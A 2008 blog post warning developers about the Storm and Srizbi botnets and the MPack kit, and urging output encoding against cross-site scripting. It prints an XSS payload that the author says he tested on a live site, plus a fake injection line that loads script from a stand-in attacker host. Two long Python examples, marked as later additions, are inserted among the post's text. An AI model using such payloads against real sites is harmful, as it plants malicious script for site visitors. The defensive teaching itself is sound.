Rob Conery

The Perfect Storm Botnet

I'm sure you've been told, numerous times no doubt, about Cross-site scripting and that it's bad. I think, for most developers, the only fear they have of XSS is looking foolish when someone hacks their site, shredding the layout of their pages and sending popups all over the screen. At least that's what I thought a while back. And it's all because I didn't quite get the depth of the soul-corroding evil that uses XSS as a primary attack point. Nor how pervasive it is.

Come with me, friends, on a Dante's journey into the black, horrible, dirty depths of the Botnet -  The Hordes of zombie drone computers on the internet that work to Enlarge your Penis, sell you Cialis, and melt your face.

An Inconvenient Zombie Death Army
I was studying up today for a book I'm writing (the security chapter) and I decided to devote the afternoon to getting to know more about spam, spammers, and the viruses they write. I know that most machines, when they get infected with a trojan or worm, become part of a larger network which coordinates distributed sending of nasty email. What I didn't know was just how evil these things really are (from Wikipedia):

The [Storm] botnet reportedly is powerful enough as of September 2007 to force entire countries off the Internet, and is estimated to be capable of executing more instructions per second than some of the world's top supercomputers. However, it is not a completely accurate comparison, according to security analyst James Turner, who said that comparing a botnet to a supercomputer is like comparing an army of snipers to a nuclear weapon.

If that made you catch your breath a bit, read on...

At certain points in time, the Storm worm used to spread the botnet has attempted to release hundreds or thousands of versions of itself onto the Internet, in a concentrated attempt to overwhelm the defenses of anti-virus and malware security firms. According to Joshua Corman, an IBM security researcher, "This is the first time that I can remember ever seeing researchers who were actually afraid of investigating an exploit."

It's one of those things that you really don't want to know about; but it's really hard to pull yourself out once you're in. This rat-hole goes very, very deep. But is it all real? Or is it just some hyped up marketing prattle to get you to buy an Antivirus? You decide for yourself.


The Picture of Evil: The Srizbi Trojan
Srizbi is only a few years old and is most likely a mutation of one of its precursors. It's a very small trojan, but it packs one hell of a punch (emphasis mine):

Apart from having an efficient spam engine, the trojan is also very capable in hiding itself from both the user and the system itself, including any products designed to remove the trojan from the system. The trojan itself is fully executed in kernel mode and has been noted to employ rootkit-like technologies to prevent any form of detection. By patching the NTFS file system drivers, the trojan will make its files invisible for both the operating system and any human user utilizing the system. The trojan is also capable of hiding network traffic it generates by directly attaching NDIS and TCP/IP drivers to its own process, a feature currently unique for this trojan. This procedure has been proved to allow the trojan to bypass both firewall and sniffer protection on the system.

Once the bot is in place and operational, it will contact one of the hardcoded servers from a list it carries with it. This server will then supply the bot with a zip file containing a number of files required by the bot to start its spamming business. The following files have been identified to be downloaded:

  1. 000_data2 - mail server domains
  2. 001_ncommall - list of names
  3. 002_senderna - list of possible sender names
  4. 003_sendersu - list of possible sender surnames
  5. config - Main spam configuration file
  6. message - HTML message to spam
  7. mlist - Recipients mail addresses
  8. mxdata - MX record data

When these files have been received, the bot will first initialize a software routine which allows it to remove files critical for revealing spam and rootkit applications. After this procedure is done, the trojan will then start sending out the spam message it has received from the control server.

This trojan actually patches the NTFS file system in a sort of "Jedi mindtrick" which tells it "I am not the trojan you're looking for". Not only that, it's able to talk DIRECTLY to the TCP/IP drivers, and hide in their cargo hold on the way out of the server bay. That, friends, is nutso.

The most insidious part of all of this is that Srizbi is written using this toolset called MPack, which is a PHP-based, commercially available malware kit. Yes, that's correct - it's a malware SDK:

Unusual for such kits, MPack is sold as commercial software (costing $500 to $1,000 US), and is provided by its developers with technical support and regular updates of the software vulnerabilities it exploits. Modules are sold by the developers containing new exploits. These cost between $50 and $150 US depending on how severe the exploit is. The developers also charge to make the scripts and executables undetectable by antivirus software.

This malware kit is especially effective at exploiting XSS holes in websites that aren't entirely prepared for XSS:

The server-side software in the kit is able to customize attacks to a variety of web browsers including Microsoft Internet Explorer, Mozilla Firefox and Opera. MPack generally works by being loaded in an IFrame attached to the bottom of a defaced website. When a user visits the page, MPack sends a script that loads in the IFrame and determines if any vulnerabilities in the browser or operating system can be exploited. If it finds any, it will exploit them and store various statistics for future reference.

Included with the server is a management console, which allows the attacker deploying the software to view statistics about the computers that have been infected, including what web browsers they were using and what countries their connections originated from.

In fact, it's been estimated that if it weren't for XSS, propagation of spam trojans like Srizbi would drop dramatically. As it stands, the network propagates itself using "Stupid Theme", wherein people are sent emails that say "we have video of you naked, click here". The subject matter changes (from naked celebrities to instant fortunes) but occasionally people end up clicking on them, get sent to a compromised site, then BAM, another drone is born.

Evil's Super Evil Twin: The Storm Worm
The Storm worm is like Srizbi, but just a tad scarier. It's spread by a system of servers that utilize a DNS-switching routine called "fast flux". Fast flux involves using one or more zombie hosts as a DNS proxy (singular or in series), and de-registering/re-registering address records and aliases up to twice a minute. This server army is literally impossible to locate, which makes the Storm botnet sort of unstoppable.
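A defender's view of the fast-flux pattern just described, as an added Python example (not code from the post or from any tool it mentions): given passive DNS observations, flag hostnames that cycle through many distinct addresses with short TTLs. The sample observations, the documentation-range addresses, the .example names and the thresholds are all constructed assumptions for the demo.

```python
from collections import defaultdict
from typing import Dict, Iterable, List, NamedTuple


class DnsObservation(NamedTuple):
    t: int          # seconds since the start of the capture
    name: str       # queried hostname
    address: str    # A record returned in the answer
    ttl: int        # TTL of that answer, in seconds


# Constructed sample: one host with a single long-lived address, and one whose
# answer moves to a fresh address every 30 seconds with a 30-second TTL (the
# "twice a minute" churn described above). Addresses come from the RFC 5737
# documentation ranges; names use the reserved .example TLD.
SAMPLE: List[DnsObservation] = (
    [DnsObservation(t, "stable.example", "192.0.2.10", 3600) for t in range(0, 181, 30)]
    + [DnsObservation(30 * i, "flux.example", f"198.51.100.{i + 1}", 30) for i in range(7)]
)


def summarize(observations: Iterable[DnsObservation]) -> Dict[str, Dict[str, float]]:
    """Per hostname: distinct addresses seen, answer changes per minute of
    observation, and the largest TTL seen."""
    by_name: Dict[str, List[DnsObservation]] = defaultdict(list)
    for o in observations:
        by_name[o.name].append(o)
    stats: Dict[str, Dict[str, float]] = {}
    for name, rows in by_name.items():
        rows.sort(key=lambda r: r.t)
        changes = sum(1 for a, b in zip(rows, rows[1:]) if a.address != b.address)
        span_minutes = max((rows[-1].t - rows[0].t) / 60.0, 1.0)  # avoid divide-by-zero
        stats[name] = {
            "distinct_addresses": len({r.address for r in rows}),
            "changes_per_minute": changes / span_minutes,
            "max_ttl": max(r.ttl for r in rows),
        }
    return stats


def is_fast_flux(s: Dict[str, float], min_addresses: int = 5,
                 max_ttl: int = 300, min_changes_per_minute: float = 0.5) -> bool:
    """Heuristic thresholds (assumed for this demo, not taken from the post):
    many distinct addresses, short TTLs and frequent changes together
    suggest a fluxing name. Tune against your own resolver logs."""
    return (s["distinct_addresses"] >= min_addresses
            and s["max_ttl"] <= max_ttl
            and s["changes_per_minute"] >= min_changes_per_minute)


def flagged_names(observations: Iterable[DnsObservation]) -> List[str]:
    """Hostnames in the capture whose resolution pattern looks like fast flux."""
    return sorted(n for n, s in summarize(observations).items() if is_fast_flux(s))


if __name__ == "__main__":
    for name, s in summarize(SAMPLE).items():
        print(f"{name:16s} {s}  fast_flux={is_fast_flux(s)}")
    print("flagged:", flagged_names(SAMPLE))
```

Legitimate services that use low TTLs for load balancing (CDNs, round-robin pools) will trip a naive version of this, so in practice the flagged list is a triage queue, not a verdict; correlating it with the observations in the post (the answers pointing at residential addresses rather than a hosting provider) is what separates flux from ordinary DNS-based load balancing.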

The thing that sets the Storm botnet (the fleet of zombie computers infected with the worm) apart is that it's actually capable of defending itself - on its own:

The Storm botnet was observed to be defending itself, and attacking computer systems that scanned for Storm virus-infected computer systems online. The botnet will defend itself with DDoS counter-attacks, to maintain its own internal integrity. At certain points in time, the Storm worm used to spread the botnet has attempted to release hundreds or thousands of versions of itself onto the Internet, in a concentrated attempt to overwhelm the defenses of anti-virus and malware security firms.

Mess with the worm, get the DDoS horns. More from Joshua Corman:

"If you try to attach a debugger, or query sites it's reporting into, it knows and punishes you instantaneously. [Over at] SecureWorks, a chunk of it DDoS-ed a researcher off the network. Every time I hear of an investigator trying to investigate, they're automatically punished. It knows it's being investigated, and it punishes them. It fights back," Corman said.

The crazy part about all of this is that no one's really sure just how big this zombie death army is; after all, it doesn't want to be seen, and doesn't want you to know it's there. These guys make money on a very weird scale: only 1 in 10 million spam emails sent results in payment, so to make more money you need to send more email. If you're busy being evil, you're not sending mail. Moreover, you're exposing yourself and your operation. It's best to remain silent and hidden, growing your Death Army one machine at a time:

According to Matt Sergeant, chief anti-spam technologist at MessageLabs, "In terms of power, [the botnet] utterly blows the supercomputers away. If you add up all 500 of the top supercomputers, it blows them all away with just 2 million of its machines. It's very frightening that criminals have access to that much computing power, but there's not much we can do about it." It is estimated that only 10%-20% of the total capacity and power of the Storm botnet is currently being used.

Spam is organized, sophisticated, and utterly morose and evil. It goes beyond annoying when you consider the power these guys have at their fingertips, and that we just can't catch them. But there is something you can do, and it's so small and so very, very simple. In fact it's only 10 little letters:

Html.Encode

Why, you may ask? Because a primary vector of release for these things is from script-injection, where the bad guys use your site to link off to a zombie host, which contains the nasty-script that wants to eat your computer's face. You can do something about this - and you should!

You Are Not Prepared
Over the last year, people have been very quick to point out that many of the samples I've created have been vulnerable to XSS. Sheepishly I've made the fix each time, kicking myself for being lame. We didn't need to worry about this so much with Web Forms, but with MVC and hand-rolling HTML, the issue has become greater, and more awareness is needed.

Yesterday as I was reading over Oxite's source code with Damien Guard (this is not to pick on them - just an illustration how easy it is to let stuff slip), I entered this in to the URL field of the comments:

"><script>alert("ha ha ha I suck");</script><a href="

Update This has been fixed at MIX online - please don't bother trying.

And wouldn't ya know it - it worked perfectly, popping up a really annoying message every time I opened the page. It happened every time because the database saved the comment, then planted my nasty script in the page each time it loaded - this is called "passive script injection".

Now if I was evil, I could have done something like this (of course this URL is fake):

"></a><script src=http://srizbitrojan.mynastyninjasite.com/spreadbadness.js></script> <a href="

This is the comment author's URL, and his name will be linkable even if you have this script line in there. If I had my hands on MPack, who knows what kind of stuff I could have done!

To get around this, all the developer needed to do was to

  1. Be aware of the evil that lies behind XSS, and why it wants to melt your face and eat your children and
  2. Use Html.Encode() on ANYTHING that is output on a page.

Please, for the children, encode your output.
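To make the "encode your output" rule concrete, here is an added example in Python (not the post's own code, and not ASP.NET's Html.Encode, which it stands in for): a comment author link rendered the way the post describes, next to the same link rendered with the value encoded for the context it lands in. It runs against the exact payload quoted above. The sample name and URL are constructed, and the rule that an href may only hold an absolute http(s) URL is an assumed site policy, added because an href is a URL context and encoding alone does not decide which URLs are acceptable there.

```python
import html
from urllib.parse import urlsplit

# Constructed sample inputs: the comment-URL payload quoted in the post, plus a
# legitimate URL and an ordinary author name, so both renderers can be compared.
PAYLOAD = '"><script>alert("ha ha ha I suck");</script><a href="'
GOOD_URL = "https://example.com/blog?page=2&sort=new"
GOOD_NAME = "Rob"


def render_author_link_unsafe(name: str, url: str) -> str:
    """The pattern the post describes: user input dropped straight into markup.
    The URL field closes the href attribute and the <a> tag, so whatever
    follows is parsed as page markup, including a <script> element."""
    return f'<a href="{url}">{name}</a>'


def safe_href(url: str) -> str:
    """An href is a URL context, not just an attribute: keep only absolute
    http(s) URLs with a host (assumed site policy for this demo) and fall back
    to an empty href for anything else."""
    parts = urlsplit(url.strip())
    if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
        return ""
    return url.strip()


def render_author_link_safe(name: str, url: str) -> str:
    """Encode each value for the context it lands in. html.escape(quote=True)
    plays the role of Html.Encode here: & < > " ' become entities, so the
    payload's closing quote and angle brackets can no longer leave the attribute."""
    href = html.escape(safe_href(url), quote=True)
    text = html.escape(name, quote=True)
    return f'<a href="{href}">{text}</a>'


def contains_markup(rendered: str) -> bool:
    """Crude check for the demo: does the rendered fragment carry a script tag,
    or more than the single <a> element we intended to emit?"""
    return "<script" in rendered.lower() or rendered.count("<a ") != 1


if __name__ == "__main__":
    for label, fn in (("unsafe", render_author_link_unsafe), ("safe", render_author_link_safe)):
        out = fn(GOOD_NAME, PAYLOAD)
        print(f"{label:6s} URL payload  -> {out!r}  injected={contains_markup(out)}")
        out = fn(PAYLOAD, GOOD_URL)
        print(f"{label:6s} name payload -> {out!r}  injected={contains_markup(out)}")
```

The point the example makes beyond the post's one-liner is that "encode everything" means encoding for the right context: the author name is text and is fully handled by the escape call, while the URL lands inside an href and needs the scheme check as well, because an encoded value is still a value the browser will try to follow.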

Further Reading
I had a really good time investigating the chapter I'm writing, and if you're interested in any of the above, here are some links to get you started. It's good stuff to know, but you'll get dirty along the way:


Posted Sat, Dec 13 2008 9:47 PM by robconery

Comments

DotNetKicks.com wrote The Perfect Storm Botnet
on Sun, Dec 14 2008 3:44 AM

You've been kicked (a good thing) - Trackback from DotNetKicks.com

The Perfect Storm Botnet « Tribulations of a giant dwarf wrote The Perfect Storm Botnet « Tribulations of a giant dwarf
on Sun, Dec 14 2008 10:29 AM

Pingback from The Perfect Storm Botnet « Tribulations of a giant dwarf

Khalid Abuhakmeh wrote re: The Perfect Storm Botnet
on Sun, Dec 14 2008 12:41 PM

I can't wait for your book with Phill Haack and Scott Hanselman.

On the subject of Oxite, do you think it would be a good idea to use it as is for a site I would like to develop? Or should I wait for a next release?


xxs test wrote re: The Perfect Storm Botnet
on Thu, Dec 18 2008 12:06 AM

Just testing on your site

and how do i remove my post on the mix 09 site

i now feal realy bad

Joshua Allen [msft] wrote re: The Perfect Storm Botnet
on Thu, Dec 18 2008 1:29 AM

@xxs test: I removed the comment for you.  You get a lump of coal in your stocking; no pony for you!  :-)


ASP.NET MVC Archived Buzz, Page 1 wrote ASP.NET MVC Archived Buzz, Page 1
on Wed, Dec 31 2008 3:15 PM

Pingback from  ASP.NET MVC Archived Buzz, Page 1

Spark build for the new year includes VS integration installer | Where's Lou wrote Spark build for the new year includes VS integration installer | Where's Lou
on Fri, Jan 2 2009 5:25 AM

Pingback from  Spark build for the new year includes VS integration installer | Where's Lou
